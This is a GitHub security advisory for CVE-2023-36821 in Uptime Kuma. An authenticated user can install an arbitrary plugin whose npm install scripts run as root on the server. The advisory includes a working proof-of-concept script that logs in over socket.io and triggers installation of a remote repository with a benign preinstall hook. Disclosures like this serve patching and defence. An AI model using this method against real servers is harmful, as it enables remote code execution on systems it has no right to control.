Skip to content

Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation

High severity GitHub Reviewed Published Jul 4, 2023 in louislam/uptime-kuma • Updated May 1, 2024

Package

npm uptime-kuma (npm)

Affected versions

<= 1.22.0

Patched versions

1.22.1

Description

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.
After downloading a plugin, it's installed by calling npm install in the installation directory of the plugin:
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc". This will be executed when installing the plugin.

  1. Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
  2. Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
  3. Confirm that the PoC file to be created doesn't exist yet:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
  1. Create file poc.js with the following content:
SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";


const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);
  1. Install socket.io-client: npm install socket.io-client
  2. Run the script: node poc.js:
# node poc.js
Login successful
Done
  1. The PoC file has been created:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

References

@louislam louislam published to louislam/uptime-kuma Jul 4, 2023
Published by the National Vulnerability Database Jul 5, 2023
Published to the GitHub Advisory Database May 1, 2024
Reviewed May 1, 2024
Last updated May 1, 2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS score

0.289%
(69th percentile)

Weaknesses

CVE ID

CVE-2023-36821

GHSA ID

GHSA-7grx-f945-mj96

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.